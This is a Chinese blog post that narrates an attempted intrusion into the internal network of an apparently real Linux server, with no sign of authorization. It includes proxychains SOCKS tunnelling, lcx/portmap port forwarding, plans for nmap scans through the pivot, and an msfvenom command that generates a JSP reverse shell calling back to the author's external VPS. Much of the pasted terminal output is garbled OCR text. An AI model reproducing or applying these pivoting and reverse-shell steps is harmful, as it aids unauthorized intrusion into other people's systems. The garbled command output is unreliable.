记录一次坎坷的linux内网渗透过程瞎折腾的坑

版权声明:本文为博主的原创文章,未经博主同意不得转载。

写在前面

每个人都有自己的思路和技巧,以前遇到一些linux的环境。这次找来一个站点来进行内网,写下自己的想法

 

目标环境

1、linux  2.6.32-358  cpu 架构(x86_64AND发行版 Red Hat Enterprise Linux Server release 6.4

2、DMZ+防火墙+行为监控,外网开放8080 8084 ...

3、服务器有utibadn用户的权限一枚

Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾: 

 外网nmap得到的一些端口指纹 

3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ E 
Link encap:Ethernet HWaddr 
255 255 24110 
Rx 
rx 
Rx 
rx 
BROADCAST RUNNING hnJLTICÅST 
packets:g37635051 
packets:472667571 
collisi ons: O txqueuelen: 1000 
1500 Metric: 1 
86027860701 
RUNNING 
packets :217616739 
packets :217616739 
s 17979909262 
(811 1 GiB) 
Mask:255A1110 
'flu: 16436 M t 
(18 7 GiB) 
byte% 
byte% 
runs: O carr 
172327259517 (16114 GiB) 
runs: O carr 
17979909262 (18 7 GiB)

内网ip 10.57.64.54   Mask 255.255.240.0 

GA/se 
Int erne t c c t1 on드 
Proto Recv-q Send-Q 
0C81 Addr 
0:22 
er/deEau1t/tmp/de 
PI oy/tmp5B40351154B 7046994 7 _i 1 
wu/]$ nets 
at - 
establ' 
1shed) 
12心 
: 1099 
0:45516 
: 111 
0: 8080 
0:35761 
0: 8083 
0: 60630 
1:25 
0: 4444 
0: 8093 
0: 4445 
0: 4446 
0:3B73 
0: 8009 
: 109B 
11 5心 6& 54:8080 
11 5心 54: 4228B 
11 5心 6& 54:42156 
11 5心 6& 54:4142B 
1 귀 Addre 
11 5心 1기 222:9507 
11 5心 6& 103:3B9 
11 5心 6& 103:3B9 
11 5心 6& 54:33301 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
EST 
EST 
EST 
EST

对比外网从服务器的信息,我们可以发现linux服务器受防火墙限制,外网只能通过8080访问内部,并且内部和12网段的222主机建立链接,这里面内网的情况至少有两个网段以上,打算做正向代理,以它为跳板进行内网渗透 (这里思路是对的,后面直接反弹的话,我的会话会被监控发现并且杀掉)

 2.3. wu/]$ -a 
Linux —d m o— 
a e app-l. sea2. net 2 a, 32-35a e16. Tue Jan 29 EST 2013

 Jas 
VERSION=b e 
3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ 
ase4 0—noarch: core4 core

 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$

这里的shell的权限是utibadn ,内核版本: 2.6.32-358  cpu 架构(x86_64AND发行版 Red Hat Enterprise Linux Server release 6.4 (Santiago) 

下面做个正向代理 

通过上传我的tunnl脚本,尝试建立sock5代理连接  

[ProxyList] 
# add proxy here . 
# meanwile 
# defaults set to "tor" 
socks4 127.0.0.1 9050 
socks5 127.0.0.1 8080

root@kati:/# proxychains wget http://127.0.0.1:8080 
ProxyChains-3.1 (http://proxychains.sf . net) 
--2017-06-06 
http://127.O.O.1:8080/ 
127.0.0.1:8080... 
OK 
HTTP , 200 OK 
: 1570 (1.5K) [text/html] 
" index. html" 
index. html 
2017-06-06 (94.4 MB/s) 
root@kali:/# 
1.53K 
. -KB/s 
in Os 
" index. 
html" [1570/1570])

proxychains netcat 127.0.0.1 1234 
ProxyChains-3.1 (http://proxychains.sf . net)

通过建立sock5隧道,这样我本地的kaliweb服务器处于同一个环境。 

我开启了我sock5的本地监听,希望接下来能够执行监听本地端口返回一个交互的会话,以便我上传对应的exp提权。 

 

这里我尝试着上传netcat的编译版本,尝试本地监听1234回来一个交互的shell 
—4 2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/netca -0 7 
3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/ ne ca -0 7 
: G ann G 
—4 2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 iss exp

Netcat编译后出现 error

—4 2 3 GA/ server/deEau_1tL /tmp/dep10y/tmp58403511548704699475 i war/]$ 
2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ 
'portmap -m 2 —pl 1234 —p? 1234 
2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ 
'portmapLcx 
-m 2 —pl 1234 —p? 1234 
2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548 704699475 iss exp 
'portmapLcx 
-m 2 —pl 1233 —p? 1234

也上传了Portmap,试了portmap的模式2也不行,都无法执行监听。

打算用proxychains+nmap对内外的环境进行常规的扫描,通过跳板挖掘其他内网的服务(ssh web ftp)或者存在漏洞的主机。

放在后台扫 

 

为什么我这里不用他反弹一个msf 的session回来呢?(后来确认是DMZ+防火墙+监控是不行的)

 

我开启我的服务器,尝试msf生成一个elf的反弹马去执行反弹到外网的vps 

「 ~ 669 g gl 
「 ~ 669 g gl 
「 ~ 669 g gl 
geog

 这里执行后发现分段错误,找了下工具包试着小迪提供的f.c反弹到我外网的vps或者本地的sock5隧道,gcc error 

2 3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ 
3 GA/ server/deEau1t/tmp/dep10y/tmp58403511548704699475 i war/]$ g 
g incompatible mplicit decl 
patible implicit declara 
'ble implicit declara  
 

这里突然有接收,美国的地址,但不是我的目标地址,这里的会话很奇怪,有点意思,我猜应该是有人执行我的反弹马测试。 23.30 洗澡睡觉

等到第二天了,到目前早上为止我的cobaltstrike服务器监听的2333没有接收到一个会话(后面确认可能是因为是DMZ+防火墙+监控)。继续翻看一些工具还有博客以及笔记看下有什么可以尝试的,虽然目标不仅仅局限于这个ip,但我还是尝试着从这个shell入手。 

没什么用的提权大马。上传php脚本看下,发现不支持php编译的反弹工具都无法使用。

换了另一种脚本反弹

msfvenom -p java/jsp_jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f raw>shell.jsp 

这里直接生成一个shell.jsp,本想上传执行直接返回 meterpreter session的 

哈哈哈,搞了大半天的思路,被内网的行为监控发现端口2333外连并且shell都杀掉了

打算重新再来的,这次打算使用脚本监听正向链接。

 

 

外网服务关闭了

 

仅作记录

 

 

 

 

版权声明:本文为博主原创文章,未经博主同意不得转载:http://www.cnblogs.com/adislj777/p/6980365.html。

 

posted @ 2017-06-10 23:32  adislj  阅读(2810)  评论(2)    收藏  举报